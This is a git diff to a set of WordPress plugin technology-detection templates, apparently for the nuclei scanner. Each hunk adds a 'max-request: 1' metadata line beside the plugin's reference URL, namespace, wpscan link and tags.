diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml
index 1ee0e67542..c222bc9d4a 100644
--- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml
+++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/insert-headers-and-footers/
   metadata:
+    max-request: 1
     plugin_namespace: insert-headers-and-footers
     wpscan: https://wpscan.com/plugin/insert-headers-and-footers
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml
index 1778552d75..9c6e3e6d2e 100644
--- a/http/technologies/wordpress/plugins/instagram-feed.yaml
+++ b/http/technologies/wordpress/plugins/instagram-feed.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/instagram-feed/
   metadata:
+    max-request: 1
     plugin_namespace: instagram-feed
     wpscan: https://wpscan.com/plugin/instagram-feed
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml
index 7ba81036cf..66b7d6a363 100644
--- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml
+++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/intuitive-custom-post-order/
   metadata:
+    max-request: 1
     plugin_namespace: intuitive-custom-post-order
     wpscan: https://wpscan.com/plugin/intuitive-custom-post-order
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/iwp-client.yaml b/http/technologies/wordpress/plugins/iwp-client.yaml
index 24fc3e3295..a36016562d 100644
--- a/http/technologies/wordpress/plugins/iwp-client.yaml
+++ b/http/technologies/wordpress/plugins/iwp-client.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/iwp-client/
   metadata:
+    max-request: 1
     plugin_namespace: iwp-client
     wpscan: https://wpscan.com/plugin/iwp-client
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml
index 3e89505574..8033aacbc6 100644
--- a/http/technologies/wordpress/plugins/jetpack-boost.yaml
+++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/jetpack-boost/
   metadata:
+    max-request: 1
     plugin_namespace: jetpack-boost
     wpscan: https://wpscan.com/plugin/jetpack-boost
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml
index e701e365ba..e4017b1a0a 100644
--- a/http/technologies/wordpress/plugins/jetpack.yaml
+++ b/http/technologies/wordpress/plugins/jetpack.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/jetpack/
   metadata:
+    max-request: 1
     plugin_namespace: jetpack
     wpscan: https://wpscan.com/plugin/jetpack
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml
index c0cc5400a8..53d6d393bd 100644
--- a/http/technologies/wordpress/plugins/kadence-blocks.yaml
+++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/kadence-blocks/
   metadata:
+    max-request: 1
     plugin_namespace: kadence-blocks
     wpscan: https://wpscan.com/plugin/kadence-blocks
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml
index 22687bcffe..c286e9a14f 100644
--- a/http/technologies/wordpress/plugins/kirki.yaml
+++ b/http/technologies/wordpress/plugins/kirki.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/kirki/
   metadata:
+    max-request: 1
     plugin_namespace: kirki
     wpscan: https://wpscan.com/plugin/kirki
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml
index b69d3d5bfe..364e3cd71e 100644
--- a/http/technologies/wordpress/plugins/leadin.yaml
+++ b/http/technologies/wordpress/plugins/leadin.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/leadin/
   metadata:
+    max-request: 1
     plugin_namespace: leadin
     wpscan: https://wpscan.com/plugin/leadin
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
index 7975a57702..4fcccbfc33 100644
--- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
+++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/limit-login-attempts-reloaded/
   metadata:
+    max-request: 1
     plugin_namespace: limit-login-attempts-reloaded
     wpscan: https://wpscan.com/plugin/limit-login-attempts-reloaded
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml
index ff4cef94d7..3fbc714d3b 100644
--- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml
+++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/limit-login-attempts/
   metadata:
+    max-request: 1
     plugin_namespace: limit-login-attempts
     wpscan: https://wpscan.com/plugin/limit-login-attempts
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml
index a8903697b0..c49b506979 100644
--- a/http/technologies/wordpress/plugins/litespeed-cache.yaml
+++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/litespeed-cache/
   metadata:
+    max-request: 1
     plugin_namespace: litespeed-cache
     wpscan: https://wpscan.com/plugin/litespeed-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml
index 3f141c4476..dfcaf6f71b 100644
--- a/http/technologies/wordpress/plugins/loco-translate.yaml
+++ b/http/technologies/wordpress/plugins/loco-translate.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/loco-translate/
   metadata:
+    max-request: 1
     plugin_namespace: loco-translate
     wpscan: https://wpscan.com/plugin/loco-translate
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml
index 5355e988a2..61be246fee 100644
--- a/http/technologies/wordpress/plugins/loginizer.yaml
+++ b/http/technologies/wordpress/plugins/loginizer.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/loginizer/
   metadata:
+    max-request: 1
     plugin_namespace: loginizer
     wpscan: https://wpscan.com/plugin/loginizer
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
index 53d409fb68..50d2e6630b 100644
--- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/mailchimp-for-woocommerce/
   metadata:
+    max-request: 1
     plugin_namespace: mailchimp-for-woocommerce
     wpscan: https://wpscan.com/plugin/mailchimp-for-woocommerce
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml
index 0e908a9580..8d71f7bde9 100644
--- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml
+++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/mailchimp-for-wp/
   metadata:
+    max-request: 1
     plugin_namespace: mailchimp-for-wp
     wpscan: https://wpscan.com/plugin/mailchimp-for-wp
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml
index aeb1875c57..5e1f97086e 100644
--- a/http/technologies/wordpress/plugins/mailpoet.yaml
+++ b/http/technologies/wordpress/plugins/mailpoet.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/mailpoet/
   metadata:
+    max-request: 1
     plugin_namespace: mailpoet
     wpscan: https://wpscan.com/plugin/mailpoet
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml
index 7c15702305..d87d456a8c 100644
--- a/http/technologies/wordpress/plugins/maintenance.yaml
+++ b/http/technologies/wordpress/plugins/maintenance.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/maintenance/
   metadata:
+    max-request: 1
     plugin_namespace: maintenance
     wpscan: https://wpscan.com/plugin/maintenance
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml
index 5ce87e6c71..aa9153241e 100644
--- a/http/technologies/wordpress/plugins/mainwp-child.yaml
+++ b/http/technologies/wordpress/plugins/mainwp-child.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/mainwp-child/
   metadata:
+    max-request: 1
     plugin_namespace: mainwp-child
     wpscan: https://wpscan.com/plugin/mainwp-child
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml
index c342e6b45a..09641796a3 100644
--- a/http/technologies/wordpress/plugins/malcare-security.yaml
+++ b/http/technologies/wordpress/plugins/malcare-security.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/malcare-security/
   metadata:
+    max-request: 1
     plugin_namespace: malcare-security
     wpscan: https://wpscan.com/plugin/malcare-security
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml
index e95041f555..28b70d09bf 100644
--- a/http/technologies/wordpress/plugins/megamenu.yaml
+++ b/http/technologies/wordpress/plugins/megamenu.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/megamenu/
   metadata:
+    max-request: 1
     plugin_namespace: megamenu
     wpscan: https://wpscan.com/plugin/megamenu
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml
index 879a0d1c12..b43c10ed7a 100644
--- a/http/technologies/wordpress/plugins/members.yaml
+++ b/http/technologies/wordpress/plugins/members.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/members/
   metadata:
+    max-request: 1
     plugin_namespace: members
     wpscan: https://wpscan.com/plugin/members
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml
index 985f5d373a..eb7e78bc7f 100644
--- a/http/technologies/wordpress/plugins/meta-box.yaml
+++ b/http/technologies/wordpress/plugins/meta-box.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/meta-box/
   metadata:
+    max-request: 1
     plugin_namespace: meta-box
     wpscan: https://wpscan.com/plugin/meta-box
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml
index bbc305b8de..3da2ea50e1 100644
--- a/http/technologies/wordpress/plugins/ml-slider.yaml
+++ b/http/technologies/wordpress/plugins/ml-slider.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/ml-slider/
   metadata:
+    max-request: 1
     plugin_namespace: ml-slider
     wpscan: https://wpscan.com/plugin/ml-slider
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml
index 7e3e4e2d7e..7a58c58f63 100644
--- a/http/technologies/wordpress/plugins/newsletter.yaml
+++ b/http/technologies/wordpress/plugins/newsletter.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/newsletter/
   metadata:
+    max-request: 1
     plugin_namespace: newsletter
     wpscan: https://wpscan.com/plugin/newsletter
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml
index 17ea142c46..5f99b8cac8 100644
--- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml
+++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/nextend-facebook-connect/
   metadata:
+    max-request: 1
     plugin_namespace: nextend-facebook-connect
     wpscan: https://wpscan.com/plugin/nextend-facebook-connect
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml
index 953e4ab3d8..b08876df04 100644
--- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml
+++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/nextgen-gallery/
   metadata:
+    max-request: 1
     plugin_namespace: nextgen-gallery
     wpscan: https://wpscan.com/plugin/nextgen-gallery
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml
index 92107fa69c..3f68dffe06 100644
--- a/http/technologies/wordpress/plugins/ninja-forms.yaml
+++ b/http/technologies/wordpress/plugins/ninja-forms.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/ninja-forms/
   metadata:
+    max-request: 1
     plugin_namespace: ninja-forms
     wpscan: https://wpscan.com/plugin/ninja-forms
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml
index 5e1fe4ef5c..34f9bde1d6 100644
--- a/http/technologies/wordpress/plugins/ocean-extra.yaml
+++ b/http/technologies/wordpress/plugins/ocean-extra.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/ocean-extra/
   metadata:
+    max-request: 1
     plugin_namespace: ocean-extra
     wpscan: https://wpscan.com/plugin/ocean-extra
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml
index 74fb3e6010..d9f645328f 100644
--- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml
+++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/official-facebook-pixel/
   metadata:
+    max-request: 1
     plugin_namespace: official-facebook-pixel
     wpscan: https://wpscan.com/plugin/official-facebook-pixel
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml
index b9f70ba555..8a1196fc9f 100644
--- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml
+++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/one-click-demo-import/
   metadata:
+    max-request: 1
     plugin_namespace: one-click-demo-import
     wpscan: https://wpscan.com/plugin/one-click-demo-import
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml
index 6486c02c9a..05025452b7 100644
--- a/http/technologies/wordpress/plugins/optinmonster.yaml
+++ b/http/technologies/wordpress/plugins/optinmonster.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/optinmonster/
   metadata:
+    max-request: 1
     plugin_namespace: optinmonster
     wpscan: https://wpscan.com/plugin/optinmonster
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml
index 81f58198d3..1db1b57708 100644
--- a/http/technologies/wordpress/plugins/otter-blocks.yaml
+++ b/http/technologies/wordpress/plugins/otter-blocks.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/otter-blocks/
   metadata:
+    max-request: 1
     plugin_namespace: otter-blocks
     wpscan: https://wpscan.com/plugin/otter-blocks
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml
index 3743307dbc..dafe6974f6 100644
--- a/http/technologies/wordpress/plugins/password-protected.yaml
+++ b/http/technologies/wordpress/plugins/password-protected.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/password-protected/
   metadata:
+    max-request: 1
     plugin_namespace: password-protected
     wpscan: https://wpscan.com/plugin/password-protected
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml
index a4c6980041..ba05fb1e16 100644
--- a/http/technologies/wordpress/plugins/pdf-embedder.yaml
+++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/pdf-embedder/
   metadata:
+    max-request: 1
     plugin_namespace: pdf-embedder
     wpscan: https://wpscan.com/plugin/pdf-embedder
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml
index e085f30e5a..a038adac53 100644
--- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/pinterest-for-woocommerce/
   metadata:
+    max-request: 1
     plugin_namespace: pinterest-for-woocommerce
     wpscan: https://wpscan.com/plugin/pinterest-for-woocommerce
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml
index adf3387ddb..7f98d822a8 100644
--- a/http/technologies/wordpress/plugins/pixelyoursite.yaml
+++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/pixelyoursite/
   metadata:
+    max-request: 1
     plugin_namespace: pixelyoursite
     wpscan: https://wpscan.com/plugin/pixelyoursite
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml
index eb6e1aaa5d..89602f4264 100644
--- a/http/technologies/wordpress/plugins/polylang.yaml
+++ b/http/technologies/wordpress/plugins/polylang.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/polylang/
   metadata:
+    max-request: 1
     plugin_namespace: polylang
     wpscan: https://wpscan.com/plugin/polylang
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/popup-builder.yaml b/http/technologies/wordpress/plugins/popup-builder.yaml
index b3c83cd0bf..2f6513ca42 100644
--- a/http/technologies/wordpress/plugins/popup-builder.yaml
+++ b/http/technologies/wordpress/plugins/popup-builder.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/popup-builder/
   metadata:
+    max-request: 1
     plugin_namespace: popup-builder
     wpscan: https://wpscan.com/plugin/popup-builder
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml
index 96d8bd6aca..982306b13c 100644
--- a/http/technologies/wordpress/plugins/popup-maker.yaml
+++ b/http/technologies/wordpress/plugins/popup-maker.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/popup-maker/
   metadata:
+    max-request: 1
     plugin_namespace: popup-maker
     wpscan: https://wpscan.com/plugin/popup-maker
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml
index 85955ac95e..fdcac13b56 100644
--- a/http/technologies/wordpress/plugins/post-smtp.yaml
+++ b/http/technologies/wordpress/plugins/post-smtp.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/post-smtp/
   metadata:
+    max-request: 1
     plugin_namespace: post-smtp
     wpscan: https://wpscan.com/plugin/post-smtp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml
index a81fc892ca..fc316f9f7a 100644
--- a/http/technologies/wordpress/plugins/post-types-order.yaml
+++ b/http/technologies/wordpress/plugins/post-types-order.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/post-types-order/
   metadata:
+    max-request: 1
     plugin_namespace: post-types-order
     wpscan: https://wpscan.com/plugin/post-types-order
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml
index d9c6052cd7..975b63f5de 100644
--- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml
+++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/premium-addons-for-elementor/
   metadata:
+    max-request: 1
     plugin_namespace: premium-addons-for-elementor
     wpscan: https://wpscan.com/plugin/premium-addons-for-elementor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml
index afc1141e0c..5065659e82 100644
--- a/http/technologies/wordpress/plugins/pretty-link.yaml
+++ b/http/technologies/wordpress/plugins/pretty-link.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/pretty-link/
   metadata:
+    max-request: 1
     plugin_namespace: pretty-link
     wpscan: https://wpscan.com/plugin/pretty-link
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml
index d44add9ca6..732ffbc4eb 100644
--- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml
+++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/really-simple-captcha/
   metadata:
+    max-request: 1
     plugin_namespace: really-simple-captcha
     wpscan: https://wpscan.com/plugin/really-simple-captcha
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml
index 20ba5c2e16..12dffeb534 100644
--- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml
+++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/really-simple-ssl/
   metadata:
+    max-request: 1
     plugin_namespace: really-simple-ssl
     wpscan: https://wpscan.com/plugin/really-simple-ssl
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml
index cbcf3cf09d..ae0e76c4bb 100644
--- a/http/technologies/wordpress/plugins/redirection.yaml
+++ b/http/technologies/wordpress/plugins/redirection.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/redirection/
   metadata:
+    max-request: 1
     plugin_namespace: redirection
     wpscan: https://wpscan.com/plugin/redirection
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml
index 3311d42c94..b1718d1ccb 100644
--- a/http/technologies/wordpress/plugins/redux-framework.yaml
+++ b/http/technologies/wordpress/plugins/redux-framework.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/redux-framework/
   metadata:
+    max-request: 1
     plugin_namespace: redux-framework
     wpscan: https://wpscan.com/plugin/redux-framework
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml
index 46c1c22805..7543ac1d55 100644
--- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml
+++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/regenerate-thumbnails/
   metadata:
+    max-request: 1
     plugin_namespace: regenerate-thumbnails
     wpscan: https://wpscan.com/plugin/regenerate-thumbnails
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml
index 7c13b8d2a4..4a29cecdb0 100644
--- a/http/technologies/wordpress/plugins/safe-svg.yaml
+++ b/http/technologies/wordpress/plugins/safe-svg.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/safe-svg/
   metadata:
+    max-request: 1
     plugin_namespace: safe-svg
     wpscan: https://wpscan.com/plugin/safe-svg
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml
index 53b30ba721..be281d91e6 100644
--- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml
+++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/seo-by-rank-math/
   metadata:
+    max-request: 1
     plugin_namespace: seo-by-rank-math
     wpscan: https://wpscan.com/plugin/seo-by-rank-math
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml
index dc3d446af3..41baa25eb7 100644
--- a/http/technologies/wordpress/plugins/sg-cachepress.yaml
+++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/sg-cachepress/
   metadata:
+    max-request: 1
     plugin_namespace: sg-cachepress
     wpscan: https://wpscan.com/plugin/sg-cachepress
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml
index 96b4699d2d..ee389af6ec 100644
--- a/http/technologies/wordpress/plugins/sg-security.yaml
+++ b/http/technologies/wordpress/plugins/sg-security.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/sg-security/
   metadata:
+    max-request: 1
     plugin_namespace: sg-security
     wpscan: https://wpscan.com/plugin/sg-security
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml
index 17584cd064..1bb9a283ce 100644
--- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml
+++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/shortcodes-ultimate/
   metadata:
+    max-request: 1
     plugin_namespace: shortcodes-ultimate
     wpscan: https://wpscan.com/plugin/shortcodes-ultimate
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
index 015fb97043..7836d9554c 100644
--- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
+++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/shortpixel-image-optimiser/
   metadata:
+    max-request: 1
     plugin_namespace: shortpixel-image-optimiser
